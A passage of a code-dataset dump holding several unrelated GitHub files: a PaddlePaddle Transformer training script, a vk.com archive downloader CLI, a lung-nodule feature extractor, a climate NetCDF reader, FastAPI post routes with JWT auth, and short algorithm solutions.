len(data) > count:\n inst_num_per_part = len(data) // count\n yield [\n data[inst_num_per_part * i:inst_num_per_part * (i + 1)]\n for i in range(count)\n ]\n\n return __impl__\n\n def split(data_reader, count):\n def __impl__():\n for item in data_reader():\n inst_num_per_part = len(item) // count\n for i in range(count):\n yield item[inst_num_per_part * i:inst_num_per_part * (i + 1\n )]\n\n return __impl__\n\n if not args.use_token_batch:\n # to make data on each device have similar token number\n data_reader = split(data_reader, count)\n if args.use_py_reader:\n pyreader.decorate_tensor_provider(\n py_reader_provider_wrapper(data_reader, place))\n data_reader = None\n else: # Data generator for multi-devices\n data_reader = stack(data_reader, count)\n return data_reader\n\n\ndef prepare_feed_dict_list(data_generator, init_flag, count):\n \"\"\"\n Prepare the list of feed dict for multi-devices.\n \"\"\"\n feed_dict_list = []\n if data_generator is not None: # use_py_reader == False\n data_input_names = encoder_data_input_fields + \\\n decoder_data_input_fields[:-1] + label_data_input_fields\n data = next(data_generator)\n for idx, data_buffer in enumerate(data):\n data_input_dict, num_token = prepare_batch_input(\n data_buffer, data_input_names, ModelHyperParams.eos_idx,\n ModelHyperParams.phone_pad_idx, ModelHyperParams.eos_idx,\n ModelHyperParams.n_head, ModelHyperParams.d_model)\n feed_dict_list.append(data_input_dict)\n if init_flag:\n for idx in range(count):\n 
pos_enc_tables = dict()\n for pos_enc_param_name in pos_enc_param_names:\n pos_enc_tables[pos_enc_param_name] = position_encoding_init(\n ModelHyperParams.max_length + 1, ModelHyperParams.d_model)\n if len(feed_dict_list) <= idx:\n feed_dict_list.append(pos_enc_tables)\n else:\n feed_dict_list[idx] = dict(\n list(pos_enc_tables.items()) + list(feed_dict_list[idx]\n .items()))\n return feed_dict_list if len(feed_dict_list) == count else None\n\n\ndef py_reader_provider_wrapper(data_reader, place):\n \"\"\"\n Data provider needed by fluid.layers.py_reader.\n \"\"\"\n\n def py_reader_provider():\n data_input_names = encoder_data_input_fields + \\\n decoder_data_input_fields[:-1] + label_data_input_fields\n for batch_id, data in enumerate(data_reader()):\n data_input_dict, num_token = prepare_batch_input(\n data, data_input_names, ModelHyperParams.eos_idx,\n ModelHyperParams.phone_pad_idx, ModelHyperParams.eos_idx,\n ModelHyperParams.n_head, ModelHyperParams.d_model)\n yield [data_input_dict[item] for item in data_input_names]\n\n return py_reader_provider\n\n\ndef test_context(exe, train_exe, dev_count):\n # Context to do validation.\n test_prog = fluid.Program()\n startup_prog = fluid.Program()\n if args.enable_ce:\n test_prog.random_seed = 1000\n startup_prog.random_seed = 1000\n with fluid.program_guard(test_prog, startup_prog):\n with fluid.unique_name.guard():\n sum_cost, avg_cost, predict, token_num, pyreader = transformer(\n ModelHyperParams.src_vocab_size,\n ModelHyperParams.trg_vocab_size,\n ModelHyperParams.max_length + 1,\n ModelHyperParams.n_layer,\n ModelHyperParams.n_head,\n ModelHyperParams.d_key,\n ModelHyperParams.d_value,\n ModelHyperParams.d_model,\n ModelHyperParams.d_inner_hid,\n ModelHyperParams.prepostprocess_dropout,\n ModelHyperParams.attention_dropout,\n ModelHyperParams.relu_dropout,\n ModelHyperParams.preprocess_cmd,\n ModelHyperParams.postprocess_cmd,\n ModelHyperParams.weight_sharing,\n TrainTaskConfig.label_smooth_eps,\n use_py_reader=args.use_py_reader,\n beta=ModelHyperParams.beta,\n is_test=True)\n test_prog = test_prog.clone(for_test=True)\n test_data = prepare_data_generator(\n args,\n is_test=True,\n count=dev_count,\n pyreader=pyreader,\n py_reader_provider_wrapper=py_reader_provider_wrapper)\n\n exe.run(startup_prog) # to init pyreader for testing\n if TrainTaskConfig.ckpt_path:\n fluid.io.load_persistables(\n exe, TrainTaskConfig.ckpt_path, main_program=test_prog)\n\n exec_strategy = fluid.ExecutionStrategy()\n exec_strategy.use_experimental_executor = True\n build_strategy = fluid.BuildStrategy()\n test_exe = fluid.ParallelExecutor(\n use_cuda=TrainTaskConfig.use_gpu,\n main_program=test_prog,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy,\n share_vars_from=train_exe)\n\n def test(exe=test_exe, pyreader=pyreader):\n test_total_cost = 0\n test_total_token = 0\n\n if args.use_py_reader:\n pyreader.start()\n data_generator = None\n else:\n data_generator = test_data()\n while True:\n try:\n feed_dict_list = prepare_feed_dict_list(data_generator, False,\n dev_count)\n outs = test_exe.run(fetch_list=[sum_cost.name, token_num.name],\n feed=feed_dict_list)\n except (StopIteration, fluid.core.EOFException):\n # The current pass is over.\n if args.use_py_reader:\n pyreader.reset()\n break\n sum_cost_val, token_num_val = np.array(outs[0]), np.array(outs[1])\n test_total_cost += sum_cost_val.sum()\n test_total_token += token_num_val.sum()\n test_avg_cost = test_total_cost / test_total_token\n test_ppl = np.exp([min(test_avg_cost, 100)])\n return 
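# The position_encoding_init() fed above is defined elsewhere in this repo;
# the sketch below is the usual sinusoidal table such a function produces
# (an assumption, shown for orientation; assumes an even d_model).
import numpy as np

def sinusoid_table(n_position, d_model):
    pos = np.arange(n_position)[:, None]                  # (P, 1)
    dim = np.arange(d_model // 2)[None, :]                # (1, D/2)
    angle = pos / np.power(10000.0, 2.0 * dim / d_model)  # (P, D/2)
    table = np.zeros((n_position, d_model), dtype="float32")
    table[:, 0::2] = np.sin(angle)   # even channels
    table[:, 1::2] = np.cos(angle)   # odd channels
    return table

assert sinusoid_table(8, 4).shape == (8, 4)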
test_avg_cost, test_ppl\n\n return test\n\n\ndef train_loop(exe,\n train_prog,\n startup_prog,\n dev_count,\n sum_cost,\n avg_cost,\n token_num,\n predict,\n pyreader,\n nccl2_num_trainers=1,\n nccl2_trainer_id=0):\n # Initialize the parameters.\n if TrainTaskConfig.ckpt_path:\n exe.run(startup_prog) # to init pyreader for training\n logging.info(\"load checkpoint from {}\".format(\n TrainTaskConfig.ckpt_path))\n fluid.io.load_persistables(\n exe, TrainTaskConfig.ckpt_path, main_program=train_prog)\n else:\n logging.info(\"init fluid.framework.default_startup_program\")\n exe.run(startup_prog)\n\n logging.info(\"begin reader\")\n train_data = prepare_data_generator(\n args,\n is_test=False,\n count=dev_count,\n pyreader=pyreader,\n py_reader_provider_wrapper=py_reader_provider_wrapper)\n\n # For faster executor\n exec_strategy = fluid.ExecutionStrategy()\n exec_strategy.use_experimental_executor = True\n exec_strategy.num_iteration_per_drop_scope = int(args.fetch_steps)\n build_strategy = fluid.BuildStrategy()\n # Since the token number differs among devices, customize gradient scale to\n # use token average cost among multi-devices. and the gradient scale is\n # `1 / token_number` for average cost.\n # build_strategy.gradient_scale_strategy = fluid.BuildStrategy.GradientScaleStrategy.Customized\n\n logging.info(\"begin executor\")\n train_exe = fluid.ParallelExecutor(\n use_cuda=TrainTaskConfig.use_gpu,\n loss_name=avg_cost.name,\n main_program=train_prog,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy,\n num_trainers=nccl2_num_trainers,\n trainer_id=nccl2_trainer_id)\n\n if args.val_file_pattern is not None:\n test = test_context(exe, train_exe, dev_count)\n\n # the best cross-entropy value with label smoothing\n loss_normalizer = -((1. - TrainTaskConfig.label_smooth_eps) * np.log(\n (1. 
- TrainTaskConfig.label_smooth_eps\n )) + TrainTaskConfig.label_smooth_eps *\n np.log(TrainTaskConfig.label_smooth_eps / (\n ModelHyperParams.trg_vocab_size - 1) + 1e-20))\n\n step_idx = 0\n init_flag = True\n\n logging.info(\"begin train\")\n for pass_id in six.moves.xrange(TrainTaskConfig.pass_num):\n pass_start_time = time.time()\n\n if args.use_py_reader:\n pyreader.start()\n data_generator = None\n else:\n data_generator = train_data()\n\n batch_id = 0\n while True:\n try:\n feed_dict_list = prepare_feed_dict_list(data_generator,\n init_flag, dev_count)\n outs = train_exe.run(\n fetch_list=[sum_cost.name, token_num.name]\n if step_idx % args.fetch_steps == 0 else [],\n feed=feed_dict_list)\n\n if step_idx % args.fetch_steps == 0:\n sum_cost_val, token_num_val = np.array(outs[0]), np.array(\n outs[1])\n # sum the cost from multi-devices\n total_sum_cost = sum_cost_val.sum()\n total_token_num = token_num_val.sum()\n total_avg_cost = total_sum_cost / total_token_num\n\n if step_idx == 0:\n logging.info(\n \"step_idx: %d, epoch: %d, batch: %d, avg loss: %f, \"\n \"normalized loss: %f, ppl: %f\" %\n (step_idx, pass_id, batch_id, total_avg_cost,\n total_avg_cost - loss_normalizer,\n np.exp([min(total_avg_cost, 100)])))\n avg_batch_time = time.time()\n else:\n logging.info(\n \"step_idx: %d, epoch: %d, batch: %d, avg loss: %f, \"\n \"normalized loss: %f, ppl: %f, speed: %.2f step/s\" %\n (step_idx, pass_id, batch_id, total_avg_cost,\n total_avg_cost - loss_normalizer, np.exp(\n [min(total_avg_cost, 100)]),\n args.fetch_steps / (time.time() - avg_batch_time)))\n avg_batch_time = time.time()\n\n if step_idx % TrainTaskConfig.save_freq == 0 and step_idx > 0:\n fluid.io.save_persistables(\n exe,\n os.path.join(TrainTaskConfig.ckpt_dir,\n \"latest.checkpoint\"), train_prog)\n fluid.io.save_params(\n exe,\n os.path.join(TrainTaskConfig.model_dir,\n \"iter_\" + str(step_idx) + \".infer.model\"),\n train_prog)\n\n init_flag = False\n batch_id += 1\n step_idx += 1\n except (StopIteration, fluid.core.EOFException):\n # The current pass is over.\n if args.use_py_reader:\n pyreader.reset()\n break\n\n time_consumed = time.time() - pass_start_time\n # Validate and save the persistable.\n if args.val_file_pattern is not None:\n val_avg_cost, val_ppl = test()\n logging.info(\n \"epoch: %d, val avg loss: %f, val normalized loss: %f, val ppl: %f,\"\n \" consumed %fs\" % (pass_id, val_avg_cost,\n val_avg_cost - loss_normalizer, val_ppl,\n time_consumed))\n else:\n logging.info(\"epoch: %d, consumed %fs\" % (pass_id, time_consumed))\n if not args.enable_ce:\n fluid.io.save_persistables(\n exe,\n os.path.join(TrainTaskConfig.ckpt_dir,\n \"pass_\" + str(pass_id) + \".checkpoint\"),\n train_prog)\n\n if args.enable_ce: # For CE\n print(\"kpis\\ttrain_cost_card%d\\t%f\" % (dev_count, total_avg_cost))\n if args.val_file_pattern is not None:\n print(\"kpis\\ttest_cost_card%d\\t%f\" % (dev_count, val_avg_cost))\n print(\"kpis\\ttrain_duration_card%d\\t%f\" % (dev_count, time_consumed))\n\n\ndef train(args):\n # priority: ENV > args > config\n is_local = os.getenv(\"PADDLE_IS_LOCAL\", \"1\")\n if is_local == '0':\n args.local = False\n logging.info(args)\n\n if args.device == 'CPU':\n TrainTaskConfig.use_gpu = False\n\n training_role = os.getenv(\"TRAINING_ROLE\", \"TRAINER\")\n\n if training_role == \"PSERVER\" or (not TrainTaskConfig.use_gpu):\n place = fluid.CPUPlace()\n dev_count = int(os.environ.get('CPU_NUM', multiprocessing.cpu_count()))\n else:\n place = fluid.CUDAPlace(0)\n dev_count = 
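# Sketch of the loss_normalizer computed above: with label smoothing, the
# target distribution itself carries entropy, so the lowest reachable
# cross-entropy is -((1 - eps) * log(1 - eps) + eps * log(eps / (V - 1))),
# and the "normalized loss" logged above is avg_cost minus this floor.
import numpy as np

def min_smoothed_ce(eps, vocab_size):
    return -((1.0 - eps) * np.log(1.0 - eps)
             + eps * np.log(eps / (vocab_size - 1) + 1e-20))

assert min_smoothed_ce(0.1, 10000) > 0.0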
fluid.core.get_cuda_device_count()\n\n exe = fluid.Executor(place)\n\n train_prog = fluid.Program()\n startup_prog = fluid.Program()\n\n if args.enable_ce:\n train_prog.random_seed = 1000\n startup_prog.random_seed = 1000\n\n with fluid.program_guard(train_prog, startup_prog):\n with fluid.unique_name.guard():\n sum_cost, avg_cost, predict, token_num, pyreader = transformer(\n ModelHyperParams.src_vocab_size,\n ModelHyperParams.trg_vocab_size,\n ModelHyperParams.phone_vocab_size,\n ModelHyperParams.max_length + 1,\n ModelHyperParams.n_layer,\n ModelHyperParams.n_head,\n ModelHyperParams.d_key,\n ModelHyperParams.d_value,\n ModelHyperParams.d_model,\n ModelHyperParams.d_inner_hid,\n ModelHyperParams.prepostprocess_dropout,\n ModelHyperParams.attention_dropout,\n ModelHyperParams.relu_dropout,\n ModelHyperParams.preprocess_cmd,\n ModelHyperParams.postprocess_cmd,\n ModelHyperParams.weight_sharing,\n TrainTaskConfig.label_smooth_eps,\n ModelHyperParams.beta,\n ModelHyperParams.bos_idx,\n use_py_reader=args.use_py_reader,\n is_test=False)\n\n optimizer = None\n if args.sync:\n lr_decay = fluid.layers.learning_rate_scheduler.noam_decay(\n ModelHyperParams.d_model, TrainTaskConfig.warmup_steps)\n logging.info(\"before adam\")\n\n with fluid.default_main_program()._lr_schedule_guard():\n learning_rate = lr_decay * TrainTaskConfig.learning_rate\n\n optimizer = fluid.optimizer.Adam(\n learning_rate=learning_rate,\n beta1=TrainTaskConfig.beta1,\n beta2=TrainTaskConfig.beta2,\n epsilon=TrainTaskConfig.eps)\n else:\n optimizer = fluid.optimizer.SGD(0.003)\n optimizer.minimize(avg_cost)\n\n if args.local:\n logging.info(\"local start_up:\")\n train_loop(exe, train_prog, startup_prog, dev_count, sum_cost, avg_cost,\n token_num, predict, pyreader)\n else:\n if args.update_method == \"nccl2\":\n trainer_id = int(os.getenv(\"PADDLE_TRAINER_ID\", \"0\"))\n port = os.getenv(\"PADDLE_PORT\")\n worker_ips = os.getenv(\"PADDLE_TRAINERS\")\n worker_endpoints = []\n for ip in worker_ips.split(\",\"):\n worker_endpoints.append(':'.join([ip, port]))\n trainers_num = len(worker_endpoints)\n current_endpoint = os.getenv(\"POD_IP\") + \":\" + port\n if trainer_id == 0:\n logging.info(\"train_id == 0, sleep 60s\")\n time.sleep(60)\n logging.info(\"trainers_num:{}\".format(trainers_num))\n logging.info(\"worker_endpoints:{}\".format(worker_endpoints))\n logging.info(\"current_endpoint:{}\".format(current_endpoint))\n append_nccl2_prepare(startup_prog, trainer_id, worker_endpoints,\n current_endpoint)\n train_loop(exe, train_prog, startup_prog, dev_count, sum_cost,\n avg_cost, token_num, predict, pyreader, trainers_num,\n trainer_id)\n return\n\n port = os.getenv(\"PADDLE_PORT\", \"6174\")\n pserver_ips = os.getenv(\"PADDLE_PSERVERS\") # ip,ip...\n eplist = []\n for ip in pserver_ips.split(\",\"):\n eplist.append(':'.join([ip, port]))\n pserver_endpoints = \",\".join(eplist) # ip:port,ip:port...\n trainers = int(os.getenv(\"PADDLE_TRAINERS_NUM\", \"0\"))\n current_endpoint = os.getenv(\"POD_IP\") + \":\" + port\n trainer_id = int(os.getenv(\"PADDLE_TRAINER_ID\"))\n\n logging.info(\"pserver_endpoints:{}\".format(pserver_endpoints))\n logging.info(\"current_endpoint:{}\".format(current_endpoint))\n logging.info(\"trainer_id:{}\".format(trainer_id))\n logging.info(\"pserver_ips:{}\".format(pserver_ips))\n logging.info(\"port:{}\".format(port))\n\n t = fluid.DistributeTranspiler()\n t.transpile(\n trainer_id,\n pservers=pserver_endpoints,\n trainers=trainers,\n program=train_prog,\n startup_program=startup_prog)\n\n if 
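# Sketch of the schedule behind the noam_decay used above:
# lr = base_lr * d_model**-0.5 * min(step**-0.5, step * warmup**-1.5),
# i.e. linear warm-up for `warmup` steps, then 1/sqrt(step) decay.
def noam_lr(step, d_model, warmup, base_lr=1.0):
    return base_lr * d_model ** -0.5 * min(step ** -0.5, step * warmup ** -1.5)

assert noam_lr(4000, 512, 4000) > noam_lr(8000, 512, 4000)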
training_role == \"PSERVER\":\n logging.info(\"distributed: pserver started\")\n current_endpoint = os.getenv(\"POD_IP\") + \":\" + os.getenv(\n \"PADDLE_PORT\")\n if not current_endpoint:\n logging.critical(\"need env SERVER_ENDPOINT\")\n exit(1)\n pserver_prog = t.get_pserver_program(current_endpoint)\n pserver_startup = t.get_startup_program(current_endpoint,\n pserver_prog)\n\n exe.run(pserver_startup)\n exe.run(pserver_prog)\n elif training_role == \"TRAINER\":\n logging.info(\"distributed: trainer started\")\n trainer_prog = t.get_trainer_program()\n\n train_loop(exe, train_prog, startup_prog, dev_count, sum_cost,\n avg_cost, token_num, predict, pyreader)\n else:\n logging.critical(\n \"environment var TRAINER_ROLE should be TRAINER os PSERVER\")\n exit(1)\n\n\nif __name__ == \"__main__\":\n LOG_FORMAT = \"[%(asctime)s %(levelname)s %(filename)s:%(lineno)d] %(message)s\"\n logging.basicConfig(\n stream=sys.stdout, level=logging.DEBUG, format=LOG_FORMAT)\n logging.getLogger().setLevel(logging.INFO)\n\n args = parse_args()\n train(args)\n","repo_name":"PaddlePaddle/Research","sub_path":"NLP/ACL2019-JEMT/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":31844,"program_lang":"python","lang":"en","doc_type":"code","stars":1671,"dataset":"github-code","pt":"90"} +{"seq_id":"12789491692","text":"import argparse\nimport logging\nimport progressbar\nfrom extractor import supported_sources\n\nKNOWN_ENCODINGS = 'windows-1251 utf-8'.split()\n\ndef parse_cmdline():\n parser = argparse.ArgumentParser(description='Download media refenced in vk.com data archive')\n parser.add_argument('archive_dir', type=str, help='Unpacked archive directory')\n parser.add_argument('--encoding', default='windows-1251', choices=KNOWN_ENCODINGS,\n help='Encoding of files in archive (default: windows-1251)')\n source_subparsers = parser.add_subparsers(help='Archive section')\n \n for source in supported_sources.values():\n source_parser = source_subparsers.add_parser(source.title)\n source.init_parser(source_parser)\n\n return parser.parse_args()\n\ndef main(cmdline):\n progressbar.streams.wrap_stderr()\n logging.basicConfig(level=logging.INFO)\n source = supported_sources[cmdline.source]\n source.call(cmdline)\n\nif __name__ == '__main__':\n main(parse_cmdline())\n","repo_name":"bcskda/vk-archive-deepercopy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"43241892399","text":"import numpy as np\nfrom skimage import measure\n\n\ndef extract_regions_from_map(img_map):\n \"\"\"Extract regions from segmentation map.\"\"\"\n #thr = np.where(img_map > np.mean(img_map), 0., 1.0) # threshold detected regions\n thr = np.where(img_map > 0.6*np.max(img_map), 1.0, 0.) 
# threshold detected regions\n    #plt.imshow(img_map)\n    #plt.imshow(thr)\n    label_image = measure.label(thr) # label them\n    labels = label_image.astype(int)\n    regions = measure.regionprops(labels)\n    return regions\n\n\ndef extract_features_from_map(slices_img_map):\n    nslices = slices_img_map.shape[0]\n    \n    totalArea = 0.\n    avgArea = 0.\n    maxArea = 0.\n    avgEcc = 0.\n    avgEquivlentDiameter = 0.\n    stdEquivlentDiameter = 0.\n    weightedX = 0.\n    weightedY = 0.\n    numNodes = 0.\n    numNodesperSlice = 0.\n    # crude heuristic to filter some bad segmentations\n    # do not allow any nodes to be larger than 10% of the pixels to eliminate background regions\n    maxAllowedArea = 0.10 * 512 * 512 \n    minAllowedArea = 9\n    \n    areas = []\n    eqDiameters = []\n    \n    for i in range(slices_img_map.shape[0]):\n        regions = extract_regions_from_map(slices_img_map[i,0,:,:])\n        for region in regions:\n            if region.area > maxAllowedArea: # or region.area < minAllowedArea:\n                continue\n            totalArea += region.area\n            areas.append(region.area)\n            avgEcc += region.eccentricity\n            avgEquivlentDiameter += region.equivalent_diameter\n            eqDiameters.append(region.equivalent_diameter)\n            weightedX += region.centroid[0]*region.area\n            weightedY += region.centroid[1]*region.area\n            numNodes += 1\n            \n    weightedX = weightedX / totalArea \n    weightedY = weightedY / totalArea\n    avgArea = totalArea / numNodes\n    avgEcc = avgEcc / numNodes\n    avgEquivlentDiameter = avgEquivlentDiameter / numNodes\n    stdEquivlentDiameter = np.std(eqDiameters)\n    \n    maxArea = np.max(areas)\n    numNodesperSlice = numNodes*1. / nslices\n    \n    return np.array([avgArea,maxArea,avgEcc,avgEquivlentDiameter,\\\n                    stdEquivlentDiameter, weightedX, weightedY, numNodes, numNodesperSlice])\n\n\n","repo_name":"mingot/lung_cancer_ds_bowl","sub_path":"src/utils/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"90"} +{"seq_id":"36070147801","text":"\"\"\"\nFunctions to read in NetCDF4 data files for CESM Climate Model\n\"\"\"\n\nfrom netCDF4 import Dataset\n\ndef ocean(oceanfilename):\n    \"\"\"\n    Function reads CESM data for the oceans\n    \n    \n    Parameters\n    ----------\n    oceanfilename : file (string)\n    \n    Returns\n    ----------\n    lon : array of longitudes\n    lat : array of latitudes\n    nino34 : time series array of nino3.4 anoms\n    nino12 : time series array of nino1+2 anoms\n    nino3 : time series array of nino3 anoms\n    nino4 : time series array of nino4 anoms\n    pdo : time series array of PDO indices\n    \"\"\"\n    directory = '/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Data/'\n    filename = directory + oceanfilename\n    values = Dataset(filename)\n    lon = values.variables['lon'][:]\n    lat = values.variables['lat'][:]\n    nino34 = values.variables['nino34'][:]\n    nino12 = values.variables['nino12'][:]\n    nino3 = values.variables['nino3'][:]\n    nino4 = values.variables['nino4'][:]\n    pdo = values.variables['pdo_timeseries_mon'][:]\n    values.close()\n\n    return lon, lat, nino34, nino12, nino3, nino4, pdo \n\n#SLPfilename = 'b.e11.B1850C5CN.f09_g16.005.cam.h1.PSL.04020101-04991231.nc'\n \ndef SLP(SLPfilename):\n    \"\"\"\n    Function reads CESM data for SLP (CESM-LE control)\n    \n    Parameters\n    ----------\n    filename : file (string)\n    \n    Returns\n    ----------\n    lon : array of longitudes\n    lat : array of latitudes\n    date : list of available dates\n    slp : sea level pressure in Pa\n    \"\"\"\n    directory = '/volumes/zml5/scripts/'\n    filename = directory + SLPfilename\n    values = Dataset(filename)\n    date = 
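# Scalar sketch of the area-weighted centroid accumulated in
# extract_features_from_map() above: weightedX = sum(centroid_x * area) / sum(area).
blobs = [((2.0, 3.0), 4), ((10.0, 1.0), 12)]   # (centroid, area) pairs
total_area = sum(a for _, a in blobs)
weighted_x = sum(c[0] * a for c, a in blobs) / total_area
assert abs(weighted_x - 8.0) < 1e-9   # (2*4 + 10*12) / 16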
values.variables['date'][:]\n lon = values.variables['lon'][185:244]\n lat = values.variables['lat'][123:155]\n SLP = values.variables['PSL'][:,123:155,185:244] \n values.close()\n \n return lon, lat, date, SLP","repo_name":"zmlabe/EarlySpringOnset","sub_path":"Scripts/control_SLP_datareader.py","file_name":"control_SLP_datareader.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"40999583564","text":"from fastapi import APIRouter, Depends, status, Response, HTTPException\nfrom typing import List\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql.functions import func\n\nfrom app.database import get_db\nfrom app.models import Post, Vote\nfrom app.oauth2 import get_current_user\nfrom app.schemas import PostResponseSchema, PostRequestSchema\n\nrouter = APIRouter(prefix='/posts', tags=['Posts'])\nsession = Depends(get_db)\n\n@router.get('/', response_model=List[PostResponseSchema])\ndef get_posts(limit: int = 10, offset: int = 0, db: Session = session, current_user = Depends(get_current_user)):\n posts = db.query(Post).filter(Post.user_id == current_user.id).limit(limit).offset(offset).all()\n\n return posts\n\n@router.get('/{id}/', response_model=PostResponseSchema)\ndef get_post(id: int, db: Session = session, current_user = Depends(get_current_user)):\n post = db.query(Post).filter(Post.id == id).first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Post with id: {id} was not found.')\n\n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail=f'Not authorized to perform requested action.')\n\n return post\n\n@router.post('/', response_model=PostResponseSchema, status_code=status.HTTP_201_CREATED)\ndef create_posts(post: PostRequestSchema, db: Session = session, current_user = Depends(get_current_user)):\n new_post = Post(user_id=current_user.id, **post.dict())\n\n db.add(new_post)\n db.commit()\n db.refresh(new_post)\n\n return new_post\n\n@router.put('/{id}/', response_model=PostResponseSchema)\ndef update_post(id: int, new_post: PostRequestSchema, db: Session = session,\n current_user: int = Depends(get_current_user)):\n post_query = db.query(Post).filter(Post.id == id)\n post = post_query.first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Post with id: {id} was not found.')\n\n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail=f'Not authorized to perform requested action.')\n\n post_query.update(new_post.dict(), synchronize_session=False)\n db.commit()\n db.refresh(post)\n\n return post\n\n@router.delete('/{id}/')\ndef delete_post(id: int, db: Session = session, current_user = Depends(get_current_user)):\n post_query = db.query(Post).filter(Post.id == id)\n post = post_query.first()\n\n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Post with id: {id} does not exist.')\n\n if post.user_id != current_user.id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,\n detail=f'Not authorized to perform requested action.')\n\n post_query.delete(synchronize_session=False)\n db.commit()\n\n return 
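# The handlers above repeat the same 404/403 ownership checks; a common
# refactor (sketch only, names assumed, not part of the original router)
# is a single shared helper:
from fastapi import HTTPException, status

def get_owned_post_or_404(db, post_model, post_id, current_user):
    post = db.query(post_model).filter(post_model.id == post_id).first()
    if not post:
        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,
                            detail=f'Post with id: {post_id} was not found.')
    if post.user_id != current_user.id:
        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN,
                            detail='Not authorized to perform requested action.')
    return post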
Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"ekoroto/fast-api","sub_path":"app/routers/post_router.py","file_name":"post_router.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"34290182947","text":"## written by xiongbiao\n## date 2020-5-28\n\n'''\nGiven an integer array nums, the 'array value' is defined as the sum of |nums[i]-nums[i+1]| over all 0 <= i < nums.length-1.\nYou may choose any subarray of nums and reverse it, but this operation may be performed only once.\nReturn the maximum 'array value' attainable.\n'''\n\nclass Solution(object):\n    def maxValueAfterReverse(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        n = len(nums)\n        ans = float('-inf')\n        ori_ans = 0\n        for i in range(1, n):\n            ori_ans += abs(nums[i] - nums[i-1])\n\n        for r in range(1, n-1):\n            delta = abs(nums[0] - nums[r + 1]) - abs(nums[r] - nums[r + 1])\n            ans = max(ans, ori_ans + delta)\n\n        for l in range(1, n-1):\n            delta = abs(nums[n - 1] - nums[l - 1]) - abs(nums[l] - nums[l - 1])\n            ans = max(ans, delta + ori_ans)\n\n        f1, f2, f3, f4 = float('-inf'), float('-inf'), float('-inf'), float('-inf')\n        for l in range(1, n):\n            abs_val = abs(nums[l] - nums[l - 1])\n            f1 = max(f1, nums[l] + nums[l - 1] - abs_val)\n            f2 = max(f2, -nums[l] + nums[l - 1] - abs_val)\n            f3 = max(f3, nums[l] - nums[l - 1] - abs_val)\n            f4 = max(f4, -nums[l] - nums[l - 1] - abs_val)\n\n        g1, g2, g3, g4 = float('-inf'), float('-inf'), float('-inf'), float('-inf')\n        for r in range(n - 1):\n            abs_val = abs(nums[r] - nums[r + 1])\n            g1 = max(g1, -nums[r] - nums[r + 1] - abs_val)\n            g2 = max(g2, -nums[r] + nums[r + 1] - abs_val)\n            g3 = max(g3, nums[r] - nums[r + 1] - abs_val)\n            g4 = max(g4, nums[r] + nums[r + 1] - abs_val)\n\n        delta = max(f1+g1, g2+f2, g3+f3, g4+f4)\n        return max(ans, ori_ans + delta)\nprint(Solution().maxValueAfterReverse([2,3,1,5,4]))\n","repo_name":"xb2342996/Algorithm-and-Data-Structure","sub_path":"LeetCode_vII/Array/1330. 翻转子数组得到最大的数组值.py","file_name":"1330. 
翻转子数组得到最大的数组值.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18285541139","text":"N=int(input())\narms=[list(map(int,input().split())) for _ in range(N)]\npoints=[]\nfor i in range(N):\n points.append([arms[i][0]-arms[i][1],arms[i][0]+arms[i][1]])\n#print(points)\npoints.sort(key=lambda x:x[1])\n#print(points)\nnowr=-float(\"inf\")\ncnt=0\nfor i in points:\n l,r=i\n if nowr<=l:\n nowr=r\n cnt=cnt+1\nprint(cnt)\n\n","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p02796/s266925570.py","file_name":"s266925570.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"24889074188","text":"from typing import Generator\nfrom app.db.sesson import LocalSession\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends, Header, HTTPException, status\n\nimport jwt\nfrom pydantic import ValidationError\n\n\nfrom app import model, crud, schemas\nfrom app.core.config import settings\n\n\ndef get_db() -> Generator:\n try:\n db = LocalSession()\n yield db\n finally:\n db.close()\n\n\ndef get_current_user(\n db: Session = Depends(get_db), authorization: str = Header(None)\n) -> model.User:\n try:\n if authorization.split()[0] not in (\"jwt\", \"JWT\"):\n raise HTTPException(400, \"credentials required\")\n token = authorization.split()[1]\n payload = jwt.decode(token, settings.SECRET_KEY, algorithms=settings.ALGORITHM)\n token_data = schemas.AccessTokenPayload(**payload)\n\n except (jwt.JWTError, ValidationError):\n raise HTTPException(\n status_code=status.HTTP_403_FORBIDDEN,\n detail=\"Could not validate credentials\",\n )\n user = crud.user.get(db, id=token_data.sub)\n if not user:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return user\n","repo_name":"Sing-it/Singit_API","sub_path":"app/api/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"18431271889","text":"import sys\nread = sys.stdin.read\nreadline = 